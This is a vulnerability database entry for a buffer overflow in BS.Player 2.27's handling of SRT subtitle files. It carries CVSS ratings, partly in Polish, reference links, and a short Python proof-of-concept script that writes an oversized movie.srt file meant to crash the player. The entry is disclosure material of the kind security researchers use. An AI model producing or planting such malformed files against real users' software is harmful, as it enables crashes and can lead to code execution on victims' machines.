BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC

2009.04.06
Credit: jorganwd
Risk: Medium
Local: No
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

#!/usr/bin/python # # BS.player 2.27 Build 959 SRT Buffer Overflow # Just rename movie.srt file with the name of the movie you like... # # Vulnerability discovered by Muris Kurgas a.k.a j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users.cg.yu # # bolexxx, learn something, ladies will come soon or l8r man! # red pill rocks! # no muts, no pain :) import os bafer = 'A' * 80000 fileHandle = open ( 'movie.srt', 'w' ) fileHandle.write ( '1\n00:00:01,001 --> 00:00:05,099\n'+bafer ) fileHandle.close()

Referencje:

http://xforce.iss.net/xforce/xfdb/41841
http://www.vupen.com/english/advisories/2008/1243/references
http://www.securityfocus.com/bid/28811
http://www.milw0rm.com/exploits/5455


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top